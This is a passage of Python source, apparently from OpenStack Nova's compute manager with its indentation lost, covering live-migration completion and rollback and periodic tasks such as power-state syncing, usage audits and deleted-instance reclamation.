post_at_dest_success = True
try:
self.compute_rpcapi.post_live_migration_at_destination(ctxt,
instance, block_migration, dest)
except Exception as error:
post_at_dest_success = False
# We don't want to break _post_live_migration() if
# post_live_migration_at_destination() fails as it should never
# affect cleaning up source node.
LOG.exception("Post live migration at destination %s failed",
dest, instance=instance, error=error)
do_cleanup, destroy_disks = self._live_migration_cleanup_flags(
migrate_data)
if do_cleanup:
LOG.debug('Calling driver.cleanup from _post_live_migration',
instance=instance)
self.driver.cleanup(ctxt, instance, network_info,
destroy_disks=destroy_disks,
migrate_data=migrate_data,
destroy_vifs=destroy_vifs)
self.instance_events.clear_events_for_instance(instance)
# NOTE(timello): make sure we update available resources on source
# host even before next periodic task.
self.update_available_resource(ctxt)
self._update_scheduler_instance_info(ctxt, instance)
self._notify_about_instance_usage(ctxt, instance,
"live_migration._post.end",
network_info=network_info)
if post_at_dest_success:
LOG.info('Migrating instance to %s finished successfully.',
dest, instance=instance)
if migrate_data and migrate_data.obj_attr_is_set('migration'):
migrate_data.migration.status = 'completed'
migrate_data.migration.save()
migration = migrate_data.migration
rc = self.scheduler_client.reportclient
# Check to see if our migration has its own allocations
allocs = rc.get_allocations_for_consumer(ctxt, migration.uuid)
else:
# We didn't have data on a migration, which means we can't
# look up to see if we had new-style migration-based
# allocations. This should really only happen in cases of
# a buggy virt driver or some really old component in the
# system. Log a warning so we know it happened.
allocs = None
LOG.warning('Live migration ended with no migrate_data '
'record. Unable to clean up migration-based '
'allocations which is almost certainly not '
'an expected situation.')
if allocs:
# We had a migration-based allocation that we need to handle
self._delete_allocation_after_move(ctxt,
instance,
migrate_data.migration,
instance.flavor,
source_node)
else:
# No migration-based allocations, so do the old thing and
# attempt to clean up any doubled per-instance allocation
rt = self._get_resource_tracker()
rt.delete_allocation_for_migrated_instance(
ctxt, instance, source_node)
def _consoles_enabled(self):
"""Returns whether a console is enable."""
return (CONF.vnc.enabled or CONF.spice.enabled or
CONF.rdp.enabled or CONF.serial_console.enabled or
CONF.mks.enabled)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def post_live_migration_at_destination(self, context, instance,
block_migration):
"""Post operations for live migration .
:param context: security context
:param instance: Instance dict
:param block_migration: if true, prepare for block migration
"""
LOG.info('Post operation of migration started',
instance=instance)
# NOTE(tr3buchet): setup networks on destination host
# this is called a second time because
# multi_host does not create the bridge in
# plug_vifs
self.network_api.setup_networks_on_host(context, instance,
self.host)
migration = {'source_compute': instance.host,
'dest_compute': self.host, }
self.network_api.migrate_instance_finish(context,
instance,
migration)
network_info = self.network_api.get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.post.dest.start",
network_info=network_info)
block_device_info = self._get_instance_block_device_info(context,
instance)
try:
self.driver.post_live_migration_at_destination(
context, instance, network_info, block_migration,
block_device_info)
except Exception:
with excutils.save_and_reraise_exception():
instance.vm_state = vm_states.ERROR
LOG.error('Unexpected error during post live migration at '
'destination host.', instance=instance)
finally:
# Restore instance state and update host
current_power_state = self._get_power_state(context, instance)
node_name = None
prev_host = instance.host
try:
compute_node = self._get_compute_info(context, self.host)
node_name = compute_node.hypervisor_hostname
except exception.ComputeHostNotFound:
LOG.exception('Failed to get compute_info for %s', self.host)
finally:
instance.host = self.host
instance.power_state = current_power_state
instance.task_state = None
instance.node = node_name
instance.progress = 0
instance.save(expected_task_state=task_states.MIGRATING)
# NOTE(tr3buchet): tear down networks on source host
self.network_api.setup_networks_on_host(context, instance,
prev_host, teardown=True)
# NOTE(vish): this is necessary to update dhcp
self.network_api.setup_networks_on_host(context, instance, self.host)
self._notify_about_instance_usage(
context, instance, "live_migration.post.dest.end",
network_info=network_info)
@wrap_exception()
@wrap_instance_fault
def _rollback_live_migration(self, context, instance,
dest, migrate_data=None,
migration_status='error'):
"""Recovers Instance/volume state from migrating -> running.
:param context: security context
:param instance: nova.objects.instance.Instance object
:param dest:
This method is called from live migration src host.
This param specifies destination host.
:param migrate_data:
if not none, contains implementation specific data.
:param migration_status:
Contains the status we want to set for the migration object
"""
if (isinstance(migrate_data, migrate_data_obj.LiveMigrateData) and
migrate_data.obj_attr_is_set('migration')):
migration = migrate_data.migration
else:
migration = None
if migration:
# Remove allocations created in Placement for the dest node.
# If migration is None, we must be so old we don't have placement,
# so no need to do something else.
self._revert_allocation(context, instance, migration)
else:
LOG.error('Unable to revert allocations during live migration '
'rollback; compute driver did not provide migrate_data',
instance=instance)
instance.task_state = None
instance.progress = 0
instance.save(expected_task_state=[task_states.MIGRATING])
# NOTE(tr3buchet): setup networks on source host (really it's re-setup)
self.network_api.setup_networks_on_host(context, instance, self.host)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
for bdm in bdms:
if bdm.is_volume:
# remove the connection on the destination host
self.compute_rpcapi.remove_volume_connection(
context, instance, bdm.volume_id, dest)
if bdm.attachment_id:
# 3.44 cinder api flow. Set the bdm's
# attachment_id to the old attachment of the source
# host. If old_attachments is not there, then
# there was an error before the new attachment was made.
old_attachments = migrate_data.old_vol_attachment_ids \
if 'old_vol_attachment_ids' in migrate_data else None
if old_attachments and bdm.volume_id in old_attachments:
self.volume_api.attachment_delete(context,
bdm.attachment_id)
bdm.attachment_id = old_attachments[bdm.volume_id]
bdm.save()
self._notify_about_instance_usage(context, instance,
"live_migration._rollback.start")
compute_utils.notify_about_instance_action(context, instance,
self.host,
action=fields.NotificationAction.LIVE_MIGRATION_ROLLBACK,
phase=fields.NotificationPhase.START,
bdms=bdms)
do_cleanup, destroy_disks = self._live_migration_cleanup_flags(
migrate_data)
if do_cleanup:
self.compute_rpcapi.rollback_live_migration_at_destination(
context, instance, dest, destroy_disks=destroy_disks,
migrate_data=migrate_data)
self._notify_about_instance_usage(context, instance,
"live_migration._rollback.end")
compute_utils.notify_about_instance_action(context, instance,
self.host,
action=fields.NotificationAction.LIVE_MIGRATION_ROLLBACK,
phase=fields.NotificationPhase.END,
bdms=bdms)
self._set_migration_status(migration, migration_status)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def rollback_live_migration_at_destination(self, context, instance,
destroy_disks,
migrate_data):
"""Cleaning up image directory that is created pre_live_migration.
:param context: security context
:param instance: a nova.objects.instance.Instance object sent over rpc
:param destroy_disks: whether to destroy volumes or not
:param migrate_data: contains migration info
"""
network_info = self.network_api.get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.rollback.dest.start",
network_info=network_info)
try:
# NOTE(tr3buchet): tear down networks on destination host
self.network_api.setup_networks_on_host(context, instance,
self.host, teardown=True)
except Exception:
with excutils.save_and_reraise_exception():
# NOTE(tdurakov): even if teardown networks fails driver
# should try to rollback live migration on destination.
LOG.exception('An error occurred while deallocating network.',
instance=instance)
finally:
# always run this even if setup_networks_on_host fails
# NOTE(vish): The mapping is passed in so the driver can disconnect
# from remote volumes if necessary
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.rollback_live_migration_at_destination(
context, instance, network_info, block_device_info,
destroy_disks=destroy_disks, migrate_data=migrate_data)
self._notify_about_instance_usage(
context, instance, "live_migration.rollback.dest.end",
network_info=network_info)
@periodic_task.periodic_task(
spacing=CONF.heal_instance_info_cache_interval)
def _heal_instance_info_cache(self, context):
"""Called periodically. On every call, try to update the
info_cache's network information for another instance by
calling to the network manager.
This is implemented by keeping a cache of uuids of instances
that live on this host. On each call, we pop one off of a
list, pull the DB record, and try the call to the network API.
If anything errors don't fail, as it's possible the instance
has been deleted, etc.
"""
heal_interval = CONF.heal_instance_info_cache_interval
if not heal_interval:
return
instance_uuids = getattr(self, '_instance_uuids_to_heal', [])
instance = None
LOG.debug('Starting heal instance info cache')
if not instance_uuids:
# The list of instances to heal is empty so rebuild it
LOG.debug('Rebuilding the list of instances to heal')
db_instances = objects.InstanceList.get_by_host(
context, self.host, expected_attrs=[], use_slave=True)
for inst in db_instances:
# We don't want to refresh the cache for instances
# which are building or deleting so don't put them
# in the list. If they are building they will get
# added to the list next time we build it.
if (inst.vm_state == vm_states.BUILDING):
LOG.debug('Skipping network cache update for instance '
'because it is Building.', instance=inst)
continue
if (inst.task_state == task_states.DELETING):
LOG.debug('Skipping network cache update for instance '
'because it is being deleted.', instance=inst)
continue
if not instance:
# Save the first one we find so we don't
# have to get it again
instance = inst
else:
instance_uuids.append(inst['uuid'])
self._instance_uuids_to_heal = instance_uuids
else:
# Find the next valid instance on the list
while instance_uuids:
try:
inst = objects.Instance.get_by_uuid(
context, instance_uuids.pop(0),
expected_attrs=['system_metadata', 'info_cache',
'flavor'],
use_slave=True)
except exception.InstanceNotFound:
# Instance is gone. Try to grab another.
continue
# Check the instance hasn't been migrated
if inst.host != self.host:
LOG.debug('Skipping network cache update for instance '
'because it has been migrated to another '
'host.', instance=inst)
# Check the instance isn't being deleting
elif inst.task_state == task_states.DELETING:
LOG.debug('Skipping network cache update for instance '
'because it is being deleted.', instance=inst)
else:
instance = inst
break
if instance:
# We have an instance now to refresh
try:
# Call to network API to get instance info.. this will
# force an update to the instance's info_cache
self.network_api.get_instance_nw_info(context, instance)
LOG.debug('Updated the network info_cache for instance',
instance=instance)
except exception.InstanceNotFound:
# Instance is gone.
LOG.debug('Instance no longer exists. Unable to refresh',
instance=instance)
return
except exception.InstanceInfoCacheNotFound:
# InstanceInfoCache is gone.
LOG.debug('InstanceInfoCache no longer exists. '
'Unable to refresh', instance=instance)
except Exception:
LOG.error('An error occurred while refreshing the network '
'cache.', instance=instance, exc_info=True)
else:
LOG.debug("Didn't find any instances for network info cache "
"update.")
@periodic_task.periodic_task
def _poll_rebooting_instances(self, context):
if CONF.reboot_timeout > 0:
filters = {'task_state':
[task_states.REBOOTING,
task_states.REBOOT_STARTED,
task_states.REBOOT_PENDING],
'host': self.host}
rebooting = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=[], use_slave=True)
to_poll = []
for instance in rebooting:
if timeutils.is_older_than(instance.updated_at,
CONF.reboot_timeout):
to_poll.append(instance)
self.driver.poll_rebooting_instances(CONF.reboot_timeout, to_poll)
@periodic_task.periodic_task
def _poll_rescued_instances(self, context):
if CONF.rescue_timeout > 0:
filters = {'vm_state': vm_states.RESCUED,
'host': self.host}
rescued_instances = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=["system_metadata"],
use_slave=True)
to_unrescue = []
for instance in rescued_instances:
if timeutils.is_older_than(instance.launched_at,
CONF.rescue_timeout):
to_unrescue.append(instance)
for instance in to_unrescue:
self.compute_api.unrescue(context, instance)
@periodic_task.periodic_task
def _poll_unconfirmed_resizes(self, context):
if CONF.resize_confirm_window == 0:
return
migrations = objects.MigrationList.get_unconfirmed_by_dest_compute(
context, CONF.resize_confirm_window, self.host,
use_slave=True)
migrations_info = dict(migration_count=len(migrations),
confirm_window=CONF.resize_confirm_window)
if migrations_info["migration_count"] > 0:
LOG.info("Found %(migration_count)d unconfirmed migrations "
"older than %(confirm_window)d seconds",
migrations_info)
def _set_migration_to_error(migration, reason, **kwargs):
LOG.warning("Setting migration %(migration_id)s to error: "
"%(reason)s",
{'migration_id': migration['id'], 'reason': reason},
**kwargs)
migration.status = 'error'
with migration.obj_as_admin():
migration.save()
for migration in migrations:
instance_uuid = migration.instance_uuid
LOG.info("Automatically confirming migration "
"%(migration_id)s for instance %(instance_uuid)s",
{'migration_id': migration.id,
'instance_uuid': instance_uuid})
expected_attrs = ['metadata', 'system_metadata']
try:
instance = objects.Instance.get_by_uuid(context,
instance_uuid, expected_attrs=expected_attrs,
use_slave=True)
except exception.InstanceNotFound:
reason = (_("Instance %s not found") %
instance_uuid)
_set_migration_to_error(migration, reason)
continue
if instance.vm_state == vm_states.ERROR:
reason = _("In ERROR state")
_set_migration_to_error(migration, reason,
instance=instance)
continue
# race condition: The instance in DELETING state should not be
# set the migration state to error, otherwise the instance in
# to be deleted which is in RESIZED state
# will not be able to confirm resize
if instance.task_state in [task_states.DELETING,
task_states.SOFT_DELETING]:
msg = ("Instance being deleted or soft deleted during resize "
"confirmation. Skipping.")
LOG.debug(msg, instance=instance)
continue
# race condition: This condition is hit when this method is
# called between the save of the migration record with a status of
# finished and the save of the instance object with a state of
# RESIZED. The migration record should not be set to error.
if instance.task_state == task_states.RESIZE_FINISH:
msg = ("Instance still resizing during resize "
"confirmation. Skipping.")
LOG.debug(msg, instance=instance)
continue
vm_state = instance.vm_state
task_state = instance.task_state
if vm_state != vm_states.RESIZED or task_state is not None:
reason = (_("In states %(vm_state)s/%(task_state)s, not "
"RESIZED/None") %
{'vm_state': vm_state,
'task_state': task_state})
_set_migration_to_error(migration, reason,
instance=instance)
continue
try:
self.compute_api.confirm_resize(context, instance,
migration=migration)
except Exception as e:
LOG.info("Error auto-confirming resize: %s. "
"Will retry later.", e, instance=instance)
@periodic_task.periodic_task(spacing=CONF.shelved_poll_interval)
def _poll_shelved_instances(self, context):
if CONF.shelved_offload_time <= 0:
return
filters = {'vm_state': vm_states.SHELVED,
'task_state': None,
'host': self.host}
shelved_instances = objects.InstanceList.get_by_filters(
context, filters=filters, expected_attrs=['system_metadata'],
use_slave=True)
to_gc = []
for instance in shelved_instances:
sys_meta = instance.system_metadata
shelved_at = timeutils.parse_strtime(sys_meta['shelved_at'])
if timeutils.is_older_than(shelved_at, CONF.shelved_offload_time):
to_gc.append(instance)
for instance in to_gc:
try:
instance.task_state = task_states.SHELVING_OFFLOADING
instance.save(expected_task_state=(None,))
self.shelve_offload_instance(context, instance,
clean_shutdown=False)
except Exception:
LOG.exception('Periodic task failed to offload instance.',
instance=instance)
@periodic_task.periodic_task
def _instance_usage_audit(self, context):
if not CONF.instance_usage_audit:
return
begin, end = utils.last_completed_audit_period()
if objects.TaskLog.get(context, 'instance_usage_audit', begin, end,
self.host):
return
instances = objects.InstanceList.get_active_by_window_joined(
context, begin, end, host=self.host,
expected_attrs=['system_metadata', 'info_cache', 'metadata',
'flavor'],
use_slave=True)
num_instances = len(instances)
errors = 0
successes = 0
LOG.info("Running instance usage audit for host %(host)s "
"from %(begin_time)s to %(end_time)s. "
"%(number_instances)s instances.",
{'host': self.host,
'begin_time': begin,
'end_time': end,
'number_instances': num_instances})
start_time = time.time()
task_log = objects.TaskLog(context)
task_log.task_name = 'instance_usage_audit'
task_log.period_beginning = begin
task_log.period_ending = end
task_log.host = self.host
task_log.task_items = num_instances
task_log.message = 'Instance usage audit started...'
task_log.begin_task()
for instance in instances:
try:
compute_utils.notify_usage_exists(
self.notifier, context, instance,
ignore_missing_network_data=False)
successes += 1
except Exception:
LOG.exception('Failed to generate usage '
'audit for instance '
'on host %s', self.host,
instance=instance)
errors += 1
task_log.errors = errors
task_log.message = (
'Instance usage audit ran for host %s, %s instances in %s seconds.'
% (self.host, num_instances, time.time() - start_time))
task_log.end_task()
@periodic_task.periodic_task(spacing=CONF.bandwidth_poll_interval)
def _poll_bandwidth_usage(self, context):
if not self._bw_usage_supported:
return
prev_time, start_time = utils.last_completed_audit_period()
curr_time = time.time()
if (curr_time - self._last_bw_usage_poll >
CONF.bandwidth_poll_interval):
self._last_bw_usage_poll = curr_time
LOG.info("Updating bandwidth usage cache")
cells_update_interval = CONF.cells.bandwidth_update_interval
if (cells_update_interval > 0 and
curr_time - self._last_bw_usage_cell_update >
cells_update_interval):
self._last_bw_usage_cell_update = curr_time
update_cells = True
else:
update_cells = False
instances = objects.InstanceList.get_by_host(context,
self.host,
use_slave=True)
try:
bw_counters = self.driver.get_all_bw_counters(instances)
except NotImplementedError:
# NOTE(mdragon): Not all hypervisors have bandwidth polling
# implemented yet. If they don't it doesn't break anything,
# they just don't get the info in the usage events.
# NOTE(PhilDay): Record that its not supported so we can
# skip fast on future calls rather than waste effort getting
# the list of instances.
LOG.info("Bandwidth usage not supported by %(driver)s.",
{'driver': CONF.compute_driver})
self._bw_usage_supported = False
return
refreshed = timeutils.utcnow()
for bw_ctr in bw_counters:
# Allow switching of greenthreads between queries.
greenthread.sleep(0)
bw_in = 0
bw_out = 0
last_ctr_in = None
last_ctr_out = None
usage = objects.BandwidthUsage.get_by_instance_uuid_and_mac(
context, bw_ctr['uuid'], bw_ctr['mac_address'],
start_period=start_time, use_slave=True)
if usage:
bw_in = usage.bw_in
bw_out = usage.bw_out
last_ctr_in = usage.last_ctr_in
last_ctr_out = usage.last_ctr_out
else:
usage = (objects.BandwidthUsage.
get_by_instance_uuid_and_mac(
context, bw_ctr['uuid'], bw_ctr['mac_address'],
start_period=prev_time, use_slave=True))
if usage:
last_ctr_in = usage.last_ctr_in
last_ctr_out = usage.last_ctr_out
if last_ctr_in is not None:
if bw_ctr['bw_in'] < last_ctr_in:
# counter rollover
bw_in += bw_ctr['bw_in']
else:
bw_in += (bw_ctr['bw_in'] - last_ctr_in)
if last_ctr_out is not None:
if bw_ctr['bw_out'] < last_ctr_out:
# counter rollover
bw_out += bw_ctr['bw_out']
else:
bw_out += (bw_ctr['bw_out'] - last_ctr_out)
objects.BandwidthUsage(context=context).create(
bw_ctr['uuid'],
bw_ctr['mac_address'],
bw_in,
bw_out,
bw_ctr['bw_in'],
bw_ctr['bw_out'],
start_period=start_time,
last_refreshed=refreshed,
update_cells=update_cells)
def _get_host_volume_bdms(self, context, use_slave=False):
"""Return all block device mappings on a compute host."""
compute_host_bdms = []
instances = objects.InstanceList.get_by_host(context, self.host,
use_slave=use_slave)
for instance in instances:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid, use_slave=use_slave)
instance_bdms = [bdm for bdm in bdms if bdm.is_volume]
compute_host_bdms.append(dict(instance=instance,
instance_bdms=instance_bdms))
return compute_host_bdms
def _update_volume_usage_cache(self, context, vol_usages):
"""Updates the volume usage cache table with a list of stats."""
for usage in vol_usages:
# Allow switching of greenthreads between queries.
greenthread.sleep(0)
vol_usage = objects.VolumeUsage(context)
vol_usage.volume_id = usage['volume']
vol_usage.instance_uuid = usage['instance'].uuid
vol_usage.project_id = usage['instance'].project_id
vol_usage.user_id = usage['instance'].user_id
vol_usage.availability_zone = usage['instance'].availability_zone
vol_usage.curr_reads = usage['rd_req']
vol_usage.curr_read_bytes = usage['rd_bytes']
vol_usage.curr_writes = usage['wr_req']
vol_usage.curr_write_bytes = usage['wr_bytes']
vol_usage.save()
self.notifier.info(context, 'volume.usage',
compute_utils.usage_volume_info(vol_usage))
@periodic_task.periodic_task(spacing=CONF.volume_usage_poll_interval)
def _poll_volume_usage(self, context):
if CONF.volume_usage_poll_interval == 0:
return
compute_host_bdms = self._get_host_volume_bdms(context,
use_slave=True)
if not compute_host_bdms:
return
LOG.debug("Updating volume usage cache")
try:
vol_usages = self.driver.get_all_volume_usage(context,
compute_host_bdms)
except NotImplementedError:
return
self._update_volume_usage_cache(context, vol_usages)
@periodic_task.periodic_task(spacing=CONF.sync_power_state_interval,
run_immediately=True)
def _sync_power_states(self, context):
"""Align power states between the database and the hypervisor.
To sync power state data we make a DB call to get the number of
virtual machines known by the hypervisor and if the number matches the
number of virtual machines known by the database, we proceed in a lazy
loop, one database record at a time, checking if the hypervisor has the
same power state as is in the database.
"""
db_instances = objects.InstanceList.get_by_host(context, self.host,
expected_attrs=[],
use_slave=True)
num_vm_instances = self.driver.get_num_instances()
num_db_instances = len(db_instances)
if num_vm_instances != num_db_instances:
LOG.warning("While synchronizing instance power states, found "
"%(num_db_instances)s instances in the database "
"and %(num_vm_instances)s instances on the "
"hypervisor.",
{'num_db_instances': num_db_instances,
'num_vm_instances': num_vm_instances})
def _sync(db_instance):
# NOTE(melwitt): This must be synchronized as we query state from
# two separate sources, the driver and the database.
# They are set (in stop_instance) and read, in sync.
@utils.synchronized(db_instance.uuid)
def query_driver_power_state_and_sync():
self._query_driver_power_state_and_sync(context, db_instance)
try:
sleep_time = random.randint(1, CONF.sync_power_state_interval)
greenthread.sleep(sleep_time)
query_driver_power_state_and_sync()
except Exception:
LOG.exception("Periodic sync_power_state task had an "
"error while processing an instance.",
instance=db_instance)
self._syncs_in_progress.pop(db_instance.uuid)
for db_instance in db_instances:
# process syncs asynchronously - don't want instance locking to
# block entire periodic task thread
uuid = db_instance.uuid
if uuid in self._syncs_in_progress:
LOG.debug('Sync already in progress for %s', uuid)
else:
LOG.debug('Triggering sync for uuid %s', uuid)
self._syncs_in_progress[uuid] = True
self._sync_power_pool.spawn_n(_sync, db_instance)
def _query_driver_power_state_and_sync(self, context, db_instance):
if db_instance.task_state is not None:
LOG.info("During sync_power_state the instance has a "
"pending task (%(task)s). Skip.",
{'task': db_instance.task_state}, instance=db_instance)
return
# No pending tasks. Now try to figure out the real vm_power_state.
try:
vm_instance = self.driver.get_info(db_instance)
vm_power_state = vm_instance.state
except exception.InstanceNotFound:
vm_power_state = power_state.NOSTATE
# Note(maoy): the above get_info call might take a long time,
# for example, because of a broken libvirt driver.
try:
self._sync_instance_power_state(context,
db_instance,
vm_power_state,
use_slave=True)
except exception.InstanceNotFound:
# NOTE(hanlind): If the instance gets deleted during sync,
# silently ignore.
pass
def _sync_instance_power_state(self, context, db_instance, vm_power_state,
use_slave=False):
"""Align instance power state between the database and hypervisor.
If the instance is not found on the hypervisor, but is in the database,
then a stop() API will be called on the instance.
"""
# We re-query the DB to get the latest instance info to minimize
# (not eliminate) race condition.
db_instance.refresh(use_slave=use_slave)
db_power_state = db_instance.power_state
vm_state = db_instance.vm_state
if self.host != db_instance.host:
# on the sending end of nova-compute _sync_power_state
# may have yielded to the greenthread performing a live
# migration; this in turn has changed the resident-host
# for the VM; However, the instance is still active, it
# is just in the process of migrating to another host.
# This implies that the compute source must relinquish
# control to the compute destination.
LOG.info("During the sync_power process the "
"instance has moved from "
"host %(src)s to host %(dst)s",
{'src': db_instance.host,
'dst': self.host},
instance=db_instance)
return
elif db_instance.task_state is not None:
# on the receiving end of nova-compute, it could happen
# that the DB instance already report the new resident
# but the actual VM has not showed up on the hypervisor
# yet. In this case, let's allow the loop to continue
# and run the state sync in a later round
LOG.info("During sync_power_state the instance has a "
"pending task (%(task)s). Skip.",
{'task': db_instance.task_state},
instance=db_instance)
return
orig_db_power_state = db_power_state
if vm_power_state != db_power_state:
LOG.info('During _sync_instance_power_state the DB '
'power_state (%(db_power_state)s) does not match '
'the vm_power_state from the hypervisor '
'(%(vm_power_state)s). Updating power_state in the '
'DB to match the hypervisor.',
{'db_power_state': db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
# power_state is always updated from hypervisor to db
db_instance.power_state = vm_power_state
db_instance.save()
db_power_state = vm_power_state
# Note(maoy): Now resolve the discrepancy between vm_state and
# vm_power_state. We go through all possible vm_states.
if vm_state in (vm_states.BUILDING,
vm_states.RESCUED,
vm_states.RESIZED,
vm_states.ERROR):
# TODO(maoy): we ignore these vm_state for now.
pass
elif vm_state == vm_states.SUSPENDED:
if not CONF.sync_power_state_unexpected_call_stop:
if vm_power_state in (power_state.SHUTDOWN,
power_state.CRASHED):
LOG.warning("Instance shutdown by itself. "
"Current vm_state: %(vm_state)s, "
"current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s",
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
db_instance.vm_state = vm_state.STOPPED
db_instance.save()
elif vm_power_state == power_state.RUNNING:
LOG.warning("Instance started running by itself. "
"Current vm_state: %(vm_state)s, "
"current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s",
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
db_instance.vm_state = vm_state.ACTIVE
db_instance.save()
elif vm_state == vm_states.ACTIVE:
# The only rational power state should be RUNNING
if vm_power_state in (power_state.SHUTDOWN,
power_state.CRASHED):
if CONF.sync_power_state_unexpected_call_stop:
LOG.warning("Instance shutdown by itself. Calling the "
"stop API. Current vm_state: %(vm_state)s, "
"current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s",
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
try:
# Note(maoy): here we call the API instead of
# brutally updating the vm_state in the database
# to allow all the hooks and checks to be performed.
if db_instance.shutdown_terminate:
self.compute_api.delete(context, db_instance)
else:
self.compute_api.stop(context, db_instance)
except Exception:
# Note(maoy): there is no need to propagate the error
# because the same power_state will be retrieved next
# time and retried.
# For example, there might be another task scheduled.
msg = "error during stop() in sync_power_state."
LOG.exception(msg, instance=db_instance)
else:
LOG.warning("Instance shutdown by itself. Not calling the "
"stop API. Action disabled by config. "
"Hypervisor-HA will take care. "
"Current vm_state: %(vm_state)s, "
"current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s",
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
db_instance.vm_state = vm_states.STOPPED
db_instance.save()
elif vm_power_state == power_state.SUSPENDED:
if CONF.sync_power_state_unexpected_call_stop:
LOG.warning("Instance is suspended unexpectedly. Calling "
"the stop API.", instance=db_instance)
try:
self.compute_api.stop(context, db_instance)
except Exception:
msg = "error during stop() in sync_power_state."
LOG.exception(msg, instance=db_instance)
else:
LOG.warning("Instance is suspended unexpectedly. Not "
"calling the stop API. Action disabled via by "
"config.", instance=db_instance)
db_instance.vm_state = vm_states.SUSPENDED
db_instance.save()
elif vm_power_state == power_state.PAUSED:
# Note(maoy): a VM may get into the paused state not only
# because the user request via API calls, but also
# due to (temporary) external instrumentations.
# Before the virt layer can reliably report the reason,
# we simply ignore the state discrepancy. In many cases,
# the VM state will go back to running after the external
# instrumentation is done. See bug 1097806 for details.
LOG.warning("Instance is paused unexpectedly. Ignore.",
instance=db_instance)
elif vm_power_state == power_state.NOSTATE:
# Occasionally, depending on the status of the hypervisor,
# which could be restarting for example, an instance may
# not be found. Therefore just log the condition.
LOG.warning("Instance is unexpectedly not found. Ignore.",
instance=db_instance)
elif vm_state == vm_states.STOPPED:
if vm_power_state not in (power_state.NOSTATE,
power_state.SHUTDOWN,
power_state.CRASHED):
if CONF.sync_power_state_unexpected_call_stop:
LOG.warning("Instance is not stopped. Calling "
"the stop API. Current vm_state: %(vm_state)s,"
" current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s",
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
try:
# NOTE(russellb) Force the stop, because normally the
# compute API would not allow an attempt to stop a
# stopped instance.
self.compute_api.force_stop(context, db_instance)
except Exception:
msg = "error during stop() in sync_power_state."
LOG.exception(msg, instance=db_instance)
else:
LOG.warning("Instance shutdown by itself. Not calling the "
"stop API. Action disabled by config. "
"Hypervisor-HA will take care. "
"Current vm_state: %(vm_state)s, "
"current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s",
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
db_instance.vm_state = vm_states.ACTIVE
db_instance.save()
elif vm_state == vm_states.PAUSED:
if vm_power_state in (power_state.SHUTDOWN,
power_state.CRASHED):
if CONF.sync_power_state_unexpected_call_stop:
LOG.warning("Paused instance shutdown by itself. Calling "
"the stop API.", instance=db_instance)
try:
self.compute_api.force_stop(context, db_instance)
except Exception:
msg = "error during stop() in sync_power_state."
LOG.exception(msg, instance=db_instance)
else:
LOG.warning("Paused instance shutdown by itself. Not "
"calling stop API. Action disabled by config.",
instance=db_instance)
db_instance.vm_state = vm_states.STOPPED
db_instance.save()
elif vm_state in (vm_states.SOFT_DELETED,
vm_states.DELETED):
if vm_power_state not in (power_state.NOSTATE,
power_state.SHUTDOWN):
# Note(maoy): this should be taken care of periodically in
# _cleanup_running_deleted_instances().
LOG.warning("Instance is not (soft-)deleted.",
instance=db_instance)
@periodic_task.periodic_task
def _reclaim_queued_deletes(self, context):
"""Reclaim instances that are queued for deletion."""
interval = CONF.reclaim_instance_interval
if interval <= 0:
LOG.debug("CONF.reclaim_instance_interval <= 0, skipping...")
return
filters = {'vm_state': vm_states.SOFT_DELETED,
'task_state': None,
'host': self.host}
instances = objects.InstanceList.get_by_filters(
context, filters,
expected_attrs=objects.instance.INSTANCE_DEFAULT_FIELDS,
use_slave=True)
for instance in instances:
if self._deleted_old_enough(instance, interval):
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
LOG.info('Reclaiming deleted instance', instance=instance)
try:
self._delete_instance(context, instance, bdms)
except Exception as e:
LOG.warning("Periodic reclaim failed to delete "
"instance: %s",
e, instance=instance)
def _get_nodename(self, instance, refresh=False):
"""Helper method to get the name of the first available node
on this host. This method should not be used with any operations
on ironic instances since it does not handle multiple nodes.
"""
node = self.driver.get_available_nodes(refresh=refresh)[0]
LOG.debug("No node specified, defaulting to %s", node,
instance=instance)
return node
def update_available_resource_for_node(self, context, nodename):
rt = self._get_resource_tracker()
try:
rt.update_available_resource(context, nodename)
except exception.ComputeHostNotFound:
# NOTE(comstud): We can get to this case if a node was
# marked 'deleted' in the DB and then re-added with a
# different auto-increment id. The cached resource
# tracker tried to update a deleted record and failed.
# Don't add this resource tracker to the new dict, so
# that this will resolve itself on the next run.
LOG.info("Compute node '%s' not found in "
"update_available_resource.", nodename)
# TODO(jaypipes): Yes, this is inefficient to throw away all of the
# compute nodes to force a rebuild, but this is only temporary
# until Ironic baremetal node resource providers are tracked
